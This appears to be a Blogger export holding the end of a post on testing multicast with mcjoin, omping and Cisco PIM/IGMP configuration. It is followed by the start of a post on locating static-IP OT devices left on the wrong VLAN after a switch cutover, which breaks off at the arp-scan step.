<br />
<h4>
Simple usage example</h4>
Sender - 192.160.10.183/24 Vlan 10<br />
Receiver - 10.112.40.1/23 Vlan46<br />
<br />
sender$ <b><i>mcjoin -s</i></b><br />
<br />
receiver$ <b><i>mcjoin</i></b><br />
joined group 225.1.2.3 on eth0 ...<br />
..................................................................<br />
Received total: <span style="color: red;">66 packets</span><br />
receiver$<br />
<br />
In this example, you start mcjoin on the sender laptop with the -s switch and mcjoin with no options on the receiver laptop. After 30 seconds or so press ctrl+c to stop the process. If multicast was successful you see the number of packets that were received.<br />
<br />
<h4>
A more advanced example</h4>
Say you want to verify that your topology can forward 5 consecutive groups in the MCAST_TEST_NET, as defined in RFC5771. Simply add the following as a standalone argument to both the receiver and the sender: 233.252.0.1+5.<br />
<br />
<b>On the sender</b><br />
./mcjoin -s 233.252.0.1+5<br />
<br />
<b>On the Receiver</b><br />
./mcjoin -t3 -i wlp0s20f3 233.252.0.1+5<br />
joined group 233.252.0.1 on wlp0s20f3 ...<br />
joined group 233.252.0.2 on wlp0s20f3 ...<br />
joined group 233.252.0.3 on wlp0s20f3 ...<br />
joined group 233.252.0.4 on wlp0s20f3 ...<br />
joined group 233.252.0.5 on wlp0s20f3 ...<br />
..................................^C<br />
Group 233.252.0.1 received 40 packets<br />
Group 233.252.0.2 received 40 packets<br />
Group 233.252.0.3 received 40 packets<br />
Group 233.252.0.4 received 40 packets<br />
Group 233.252.0.5 received 40 packets<br />
Received total: 200 packets<br />
<br />
<br />
<h3>
Using omping (open multicast ping)</h3>
omping is available from the same github site as mcjoin.<br />
<br />
<b>Install omping</b><br />
https://github.com/troglobit/omping/<br />
<br />
Simple example with two hosts. You can use more than two hosts.<br />
<br />
Run the following on both laptops<br />
<br />
<b><i>./omping 10.112.40.1 192.168.10.183</i></b><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : waiting for response msg</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : joined (S,G) = (*, 232.43.211.234), pinging</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : unicast, seq=1, size=69 bytes, dist=1, time=1.669ms</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : unicast, seq=2, size=69 bytes, dist=1, time=3.906ms</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : multicast, seq=2, size=69 bytes, dist=1, time=4.177ms</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : unicast, seq=3, size=69 bytes, dist=1, time=3.564ms</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : multicast, seq=3, size=69 bytes, dist=1, time=3.860ms</span><br />
^C<br />
10.112.40.1 : unicast, xmt/rcv/%loss = 3/3/0%, min/avg/max/std-dev = 1.669/3.046/3.906/1.205<br />
10.112.40.1 : <span style="color: red;">multicast, xmt/rcv/%loss</span> = 3/2/33% (seq>=2 0%), min/avg/max/std-dev = 3.860/4.019/4.177/0.224<br />
<br />
<h4>
On the Switch</h4>
<div>
<br /></div>
<b><i>sh ip igmp groups </i></b><br />
IGMP Connected Group Membership<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Group Address Interface Uptime Expires Last Reporter Group Accounted</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">233.89.188.1 Vlan10 02:12:24 00:02:37 192.168.10.50 </span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">239.255.255.254 Vlan10 02:12:24 00:02:41 192.168.10.221 </span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">239.255.255.250 Vlan10 02:12:25 00:02:40 192.168.10.239 </span><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace; font-size: x-small;">232.43.211.234 Vlan10 00:00:02 00:02:57 192.168.10.183 </span><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace; font-size: x-small;">232.43.211.234 Vlan46 00:00:13 00:02:46 10.112.40.1 </span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">224.0.1.60 Vlan10 02:12:24 00:02:43 192.168.10.239 </span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">224.0.1.40 Vlan10 01:52:28 00:02:36 192.168.10.52 </span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">224.0.1.140 Vlan10 02:12:24 00:02:39 192.168.10.254 </span><br />
<div>
<br /></div>
<h4>
Using omping to test multicast with a specified multicast IP and port</h4>
From 192.168.10.183<br />
<br />
<br />
<b><i>./omping -m 233.252.0.1 -p 9106 10.112.40.1 192.168.10.183</i></b><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : waiting for response msg</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : waiting for response msg</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : joined (S,G) = (*, 233.252.0.1), pinging</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : unicast, seq=1, size=69 bytes, dist=1, time=1.574ms</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : multicast, seq=1, size=69 bytes, dist=1, time=53.798ms</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : unicast, seq=2, size=69 bytes, dist=1, time=2.608ms</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : multicast, seq=2, size=69 bytes, dist=1, time=2.608ms</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : unicast, seq=3, size=69 bytes, dist=1, time=1.679ms</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : multicast, seq=3, size=69 bytes, dist=1, time=1.809ms</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : unicast, seq=4, size=69 bytes, dist=1, time=1.595ms</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : multicast, seq=4, size=69 bytes, dist=1, time=1.901ms</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : unicast, seq=5, size=69 bytes, dist=1, time=1.811ms</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : multicast, seq=5, size=69 bytes, dist=1, time=2.043ms</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : waiting for response msg</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">10.112.40.1 : server told us to stop</span><br />
<br />
10.112.40.1 : unicast, xmt/rcv/%loss = 5/5/0%, min/avg/max/std-dev = 1.574/1.853/2.608/0.432<br />
10.112.40.1 : <span style="color: red;">multicast, xmt/rcv/%loss</span> = 5/5/0%, min/avg/max/std-dev = 1.809/12.432/53.798/23.126<br />
<br />
<br />
<b>On the switch</b><br />
<b><br /></b> <b><i>sh ip igmp groups</i></b><br />
IGMP Connected Group Membership<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Group Address Interface Uptime Expires Last Reporter Group Accounted</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">233.89.188.1 Vlan10 02:13:26 00:02:34 192.168.10.50 </span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">239.255.255.254 Vlan10 02:13:26 00:02:33 192.168.10.221 </span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">239.255.255.250 Vlan10 02:13:27 00:02:40 192.168.10.239 </span><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace; font-size: x-small;">233.252.0.1 Vlan10 00:00:09 00:00:01 192.168.10.183 </span><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace; font-size: x-small;">233.252.0.1 Vlan46 00:00:13 00:02:46 10.112.40.1 </span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">224.0.1.60 Vlan10 02:13:27 00:02:37 192.168.10.239 </span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">224.0.1.40 Vlan10 01:53:31 00:02:41 192.168.10.52 </span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">224.0.1.140 Vlan10 02:13:26 00:02:36 192.168.10.254 </span><br />
<div>
<br /></div>
<div>
<br /></div>
<div>
<h3>
Switch Configuration</h3>
<div>
3750x(config)#<b><i>ip multicast-routing distributed</i></b> </div>
<div>
<br /></div>
<div>
interface vl 10</div>
<div>
ip address 192.168.10.52 255.255.255.0</div>
<div>
no ip redirects</div>
<div>
<span style="color: red;">ip pim sparse-mode</span></div>
<div>
end</div>
<div>
<br /></div>
<div>
interface Vlan46</div>
<div>
ip address 10.112.41.254 255.255.254.0</div>
<div>
ip helper-address 192.168.10.221</div>
<div>
<span style="color: red;">ip pim sparse-mode</span></div>
<div>
end</div>
<div>
<br /></div>
<div>
<b>Create a loopback to use as the rendezvous point (RP)</b></div>
<div>
interface Loopback0</div>
<div>
ip address 10.10.10.10 255.255.255.255</div>
<div>
end</div>
<div>
<br /></div>
<div>
<b>Create the Rendevouz point (RP)</b></div>
<div>
ip pim rp-address 10.10.10.10</div>
<div>
<br /></div>
<div>
<b>Show the rendezvous point</b></div>
<div>
<b><i>sh ip pim rp </i></b> </div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Group: 233.89.188.1, RP: 10.10.10.10, next RP-reachable never</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Group: 239.255.255.254, RP: 10.10.10.10, next RP-reachable never</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Group: 239.255.255.250, RP: 10.10.10.10, next RP-reachable never</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Group: 233.252.0.1, RP: 10.10.10.10, next RP-reachable never</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Group: 224.0.1.60, RP: 10.10.10.10, next RP-reachable never</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Group: 224.0.1.40, RP: 10.10.10.10, next RP-reachable never</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Group: 224.0.1.140, RP: 10.10.10.10, next RP-reachable never</span></div>
<div>
<br /></div>
<div>
<b><i>sh ip multicast </i></b></div>
<div>
Multicast Routing: enabled</div>
<div>
Multicast Multipath: disabled</div>
<div>
Multicast Route limit: No limit</div>
<div>
Multicast Fallback group mode: Dense</div>
<div>
Number of multicast boundaries configured with filter-autorp option: 0</div>
<div>
MoFRR: Disabled</div>
<div>
<br /></div>
<div>
From the Cisco multicast manual - Mulitcast configuration on an SVI</div>
<div>
An SVI—A VLAN interface created by using the interface vlan vlan-id global configuration command. You will also need to enable IP PIM sparse-dense-mode on the VLAN, join the VLAN as a statically connected member to an IGMP static group, and then enable IGMP snooping on the VLAN, the IGMP static group, and physical interface. These interfaces must have IP addresses assigned to them. </div>
<div>
<br /></div>
<div>
<b>sparse-mode - </b>Enables sparse mode of operation. <span style="color: red;"><b>If you configure sparse mode, you must also configure an RP. </b></span></div>
<div>
<br /></div>
<div>
<b><i>sh ip igmp snooping </i></b></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Global IGMP Snooping configuration:</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">-------------------------------------------</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">IGMP snooping : Enabled</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">IGMPv3 snooping (minimal) : Enabled</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Report suppression : Enabled</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">TCN solicit query : Disabled</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">TCN flood PortFast : Disabled</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">TCN flood query count : 2</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Robustness variable : 2</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Last member query count : 2</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Last member query interval : 1000</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<b><span style="font-family: "courier new" , "courier" , monospace;">Vlan 10:</span></b></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">--------</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">IGMP snooping : Enabled</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">IGMPv2 immediate leave : Disabled</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Multicast router learning mode : pim-dvmrp</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">CGMP interoperability mode : IGMP_ONLY</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Robustness variable : 2</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Last member query count : 2</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Last member query interval : 1000</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<b><span style="font-family: "courier new" , "courier" , monospace;">Vlan 46:</span></b></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">--------</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">IGMP snooping : Enabled</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">IGMPv2 immediate leave : Disabled</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Multicast router learning mode : pim-dvmrp</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">CGMP interoperability mode : IGMP_ONLY</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Robustness variable : 2</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Last member query count : 2</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Last member query interval : 1000</span></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
References</div>
<div>
<a href="https://www.ibm.com/support/knowledgecenter/en/SSWMAJ_2.0.0/com.ibm.ism.doc/Administering/ad00943_.html">Using omping to test multicast connectivity in clusters</a></div>
<div>
<a href="https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst3750x_3560x/software/release/15-2_2_e/multicast/configuration_guide/b_mc_1522e_3750x_3560x_cg/b_mc_3750x_3560x_chapter_011.html">IP Multicast Routing Configuration Guide, Cisco IOS Release 15.2(2)E (3750-X and 3560-X) </a></div>
<div>
<a href="https://rtfmp.com/2016/02/18/omping-multicast-linux/">Check multicast is working with omping in Linux</a></div>
<div>
<a href="http://troglobit.com/2016/03/07/multicast-testing/">Multicast testing, made easy!</a><br />
<a href="https://unix.stackexchange.com/questions/25872/how-can-i-know-if-ip-multicast-is-enabled">How can I know if IP Multicast is enabled</a><br />
<a href="https://lkml.org/lkml/2004/8/5/143">Multicast Driver Testing Quick How-To v 0.3</a><br />
<a href="https://www.sanfoundry.com/10-ping-command-usage-examples-linux/">10 “ping” Command Usage Examples in Linux</a></div>
<div>
<br /></div>
<div>
<br /></div>
@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com0tag:blogger.com,1999:blog-690329124282786689.post-19385182877271338392019-02-17T16:45:00.002-08:002019-02-17T17:23:26.052-08:00Locate IP devices on the wrong vlanWhen replacing switches, sometimes a device like a Building Automation Control (BACnet) controllers or fire alarm quits working. This is usually because they got patched into the wrong port and now the IP address doesn’t work.<br />
<br />
Since these devices normally have static IP addresses and seldom send a packet outbound, their MAC addresses don't register on the switch. This can lead to lost time and aggravation trying to get them back online, especially if they are in a remote cabinet or a switch that is physically hard to reach. This blog will show a process to reduce the time needed to locate the port the device is connected to, so that the problem can be resolved.<br />
<br />
<br />
<h3 style="line-height: 100%; margin-bottom: 0in;">
Here are the steps to take before the cutover</h3>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<h4 style="line-height: 100%; margin-bottom: 0in;">
On the core switch</h4>
<h4 style="line-height: 100%; margin-bottom: 0in;">
</h4>
<div style="line-height: 100%; margin-bottom: 0in;">
First, ping all host addresses for subnets of interest on the core switch. This will refresh the arp cache so that devices like BACnet controllers and alarms that have timed out will be in the cache. To do that:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<ul>
<li>Execute <span style="font-family: "courier new" , "courier" , monospace;"><b><i>show run | i ^_ip address</i></b></span> - The <span style="font-family: "courier new" , "courier" , monospace;"><i><b>i</b></i></span> means include, the <span style="font-family: "courier new" , "courier" , monospace;"><i><b>^</b></i></span> means start at the first character, the <span style="font-family: "courier new" , "courier" , monospace;"><i><b>_</b></i></span> means look for one space, and <span style="font-family: "courier new" , "courier" , monospace;"><b><i>ip address</i></b> </span>is the string to look for. This regex returns just IP addresses from the SVIs, not every instance of the string ip address.</li>
<li>Copy the output to a text file named vlans.txt</li>
<li>Run the python3 script pinger.py - You can download the script and read its documentation <a href="https://github.com/rikosintie/pingSVI">here</a>. This script converts the subnet address into hosts and pings each host.</li>
<li>Execute <span style="font-family: "courier new" , "courier" , monospace;"><i><b>show ip arp</b></i></span></li>
<li>Copy the output to a text file named arp.txt</li>
<li>Run the <span style="font-family: "courier new" , "courier" , monospace;"><i><b>python3 script arp.py</b></i></span> - You can download the script and read its documentation <a href="https://github.com/rikosintie/ARP-Sort">here</a>. This script creates a json database of the MAC address/IP address mappings and is used with the next script.</li>
</ul>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<h4>
On each edge switch</h4>
<ul>
<li>Execute <span style="font-family: "courier new" , "courier" , monospace;"><b><i>show mac add int g1/0/1 | i Gi</i></b></span> for each edge port on the switch.</li>
<li>Copy the output to a text file named mac-addr.txt. I created a spreadsheet with the necessary commands for several Cisco models and Rukus (Brocade) switches. You can download it <a href="https://github.com/rikosintie/Documents">here</a>.</li>
<li>Run the <span style="font-family: "courier new" , "courier" , monospace;"><i><b>python3 script macaddr.py</b></i></span> - You can download the script and read its documentation <a href="https://github.com/rikosintie/MAC2Manuf">here</a>.</li>
</ul>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
The last step creates a listing of switch ports with the IP address, MAC address, Port and MAC Manufacture: </div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-size: x-small;"><span style="font-family: "courier new" , "courier" , monospace;">Device Name: Test.MDF <br />Vlan IP Address MAC Address Type Interface Vendor<br />--------------------------------------------------------------------------------<br /> 16 172.16.16.9 0020.4adb.3e21 DYNAMIC Gi1/0/5 Pronet<br />--------------------------------------------------------------------------------<br /> 26 172.16.26.94 54ee.7505.86b5 DYNAMIC Gi1/0/14 WistronI<br />--------------------------------------------------------------------------------<br /> 23 172.16.23.117 5442.49a1.06c6 DYNAMIC Gi1/0/47 Sony<br />--------------------------------------------------------------------------------<br /> 20 172.16.20.153 000c.820d.007e DYNAMIC Gi2/0/24 NetworkT<br />--------------------------------------------------------------------------------<br /> 20 172.16.20.96 0040.9d97.a3aa DYNAMIC Gi2/0/26 Digiboar<br />--------------------------------------------------------------------------------<br /> 20 172.16.21.96 cc72.0fff.f6a5 DYNAMIC Gi2/0/27 Viscount<br />--------------------------------------------------------------------------------<br /> 20 172.16.25.96 0024.7900.095b DYNAMIC Gi2/0/30 OptecDis<br />--------------------------------------------------------------------------------</span></span><br />
<br />
For this example, I have trimmed the list so it only shows devices that I know are static IP devices like Pronet which is a serial to IP device server, Sony, which in this case is a Surveillance camera, Digiboard which is a serial to IP console server, etc. These are all devices that are critical to the company's operation and I want to make sure they work after the cut over. </div>
<div style="line-height: 100%; margin-bottom: 0in;">
The macaddr.py script also creates a section with just the IP address and MAC address. Here is a snippet of it:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
<span style="font-family: "courier new" , "courier" , monospace;">Device Name: Test.MDF </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">PingInfo Data<br />172.16.16.9 0020.4adb.3e21<br />172.16.26.94 54ee.7505.86b5</span><br />
<br />
I take that information and save it to a text file named PingInfo-xxx, where xxx is something meaningful for the site. I use the text file with a free program <a href="https://www.nirsoft.net/utils/multiple_ping_tool.html">PingInfoView</a> from www.nirsoft.net to create a dashboard of live ping results. Below is an example of a PingInfo dashboard. PingInfo is Windows only!</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD6LxEF-QmO63w_yId2bE4wgqY3OQVPYL5SwhQDSiaFpwkaNled_5bPhCq-QF_a72vXNUpkLejNjwsAFIirqLFhRsK0SWpIs_gg63DcU0EjIZqcmt5DArrZoBDBZnNfxl45dIl-1ucMtv0/s1600/PingInfo.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="250" data-original-width="207" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD6LxEF-QmO63w_yId2bE4wgqY3OQVPYL5SwhQDSiaFpwkaNled_5bPhCq-QF_a72vXNUpkLejNjwsAFIirqLFhRsK0SWpIs_gg63DcU0EjIZqcmt5DArrZoBDBZnNfxl45dIl-1ucMtv0/s400/PingInfo.png" width="331" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
PingInfoView continuously pings the addresses and any address that stops responding turns red. Obviously, we want all addresses to be green after the cut over!</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<h3>
After the cut over</h3>
<div style="line-height: 100%; margin-bottom: 0in;">
The PingInfo dashboard should be all green. But what do you do if one of the static ip devices isn't live in the dashboard? Since many of these devices are Operational Technology (OT) versus IT they seldom send any traffic onto the network so immediately after a cut over the port they are connected to won't have a MAC address. If it got connected to a port on the wrong vlan you won't be able to ping it to populate the MAC address table.<br />
<br />
There is a Linux tool called <a href="https://github.com/royhills/arp-scan">arp-scan</a> by Roy Hill that you can use to send arp requests to a device. It can also send arp requests with an 802.1q vlan tag. This is the key to finding the lost device.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<h4>
How to use arp-scan</h4>
<h4>
</h4>
<div style="line-height: 100%; margin-bottom: 0in;">
Here is the network diagram for our example:</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfGYW5JRKTpuY8zCv26p_dTOtGRF9-D9XwOL9Ne8DKRUyABeWPCG0qUPqIjf-F15RlL_G4hmEGxWNFiio-3RZv_boKfAMrg5J0PsExBXZP27Qf6nnOcU74GuSK_EfFFow3OBt9RUR3kzc7/s1600/Visio.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="423" data-original-width="351" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfGYW5JRKTpuY8zCv26p_dTOtGRF9-D9XwOL9Ne8DKRUyABeWPCG0qUPqIjf-F15RlL_G4hmEGxWNFiio-3RZv_boKfAMrg5J0PsExBXZP27Qf6nnOcU74GuSK_EfFFow3OBt9RUR3kzc7/s320/Visio.PNG" width="265" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
In my lab, I used a Kali VM to simulate an OT device. At a real customer site, you obviously wouldn't know what port the device is connected to.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
First, you will need to install arp-scan on the Ubuntu box:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><i>sudo apt install arp-scan</i></b></span><br />
<br />
You can use <i><b>arp-scan --help</b></i> to see all of the options for arp-scan. It has a lot of uses, if you Google arp-scan examples, you will find a lot of good ones. I wrote a pyhton script that uses arp-scan to find open IP addresses on a subnet. It's useful when you need to connect to a subnet that doesn't have DHCP but you don't want to cause an IP address conflict. You can download it <a href="https://github.com/rikosintie/arp-scan">here</a>.<br />
<br />
To use arp-scan in our case, we need to know the interface on the Ubuntu box, the MAC address of the device (Destination MAC), the vlan ID of the switch port and the ip network the device is on. </div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
For the vlan ID, we select one from the vlans configured on the switch. You can use <span style="font-family: "courier new" , "courier" , monospace;"><i><b>show vlan brief</b></i></span> to see a list of vlans assigned to ports. If the switch has a lot of vlans defined you may have to run the command several times, iterating through different vlans.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
In this example:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">Linux interface - enp2s0f1<br />vlan ID - 46 (10.112.46.0/23)<br />Device MAC – 00:90:9e:9a:b5:3d<br />Device IP – 10.112.100.1<br />Device Subnet - 10.112.100.0/24</span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
As you can see in the diagram, the simulated device is on port g1/0/48 which is configured as an access port on vlan 46. The Linux box with arp-scan is on a trunk port. The requirement here is that the trunk can pass vlan tags on vlan 46. </div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
It doesn't matter if the trunk has a native vlan with DHCP. Security best practices dictates that the native vlan nk on a trunk be an unused vlan. For our purposes, we don’t care if the interface has an IP address since we are using arp. You will see in the output that the IP address on the interface isn’t set.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<h4 style="line-height: 100%; margin-bottom: 0in;">
Interface configuration for the Ubuntu laptop</h4>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-family: "courier new" , "courier" , monospace;"><i><b>sh run int g1/0/47</b></i></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">interface GigabitEthernet1/0/47</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> switchport trunk encapsulation dot1q</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> switchport mode trunk</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">end</span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<h4>
On theUbuntu laptop connected to port g1/0/47</h4>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-family: "courier new" , "courier" , monospace;"><i><b>ip addr show enp2s0f1</b></i></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-family: "courier new" , "courier" , monospace;"><i><b> </b></i> <br />2: enp2s0f1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000<br /> link/ether 80:fa:5b:31:de:85 brd ff:ff:ff:ff:ff:ff<br /> inet6 fe80::6d35:51a0:cef:4475/64 scope link noprefixroute <br /> valid_lft forever preferred_lft forever</span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "courier new" , "courier" , monospace;">You can see that it doesn't have an IP address</span>.</span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<h4 style="line-height: 100%; margin-bottom: 0in;">
Interface configuration for the simulated device</h4>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<style type="text/css">p { margin-bottom: 0.1in; line-height: 115%; }</style></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-family: "courier new" , "courier" , monospace;"><i><b>sh run int g1/0/48</b></i><br />interface GigabitEthernet1/0/48<br /> switchport access vlan 46<br /> switchport mode access<br />end</span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<h4>
SVI Interfaces</h4>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-family: "courier new" , "courier" , monospace;"><i><b>sh run int vl 46</b></i><br />interface Vlan46<br /> ip address 10.112.47.254 255.255.254.0<br /> ip helper-address 192.168.10.221<br /> no ip redirects<br />end<br /><br /><i><b>sh run int vl 100</b></i><br />interface Vlan100<br /> ip address 10.112.100.254 255.255.255.0<br /> ip helper-address 192.168.10.221<br /> no ip redirects<br />end</span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<h4 style="line-height: 100%; margin-bottom: 0in;">
Run arp-scan</h4>
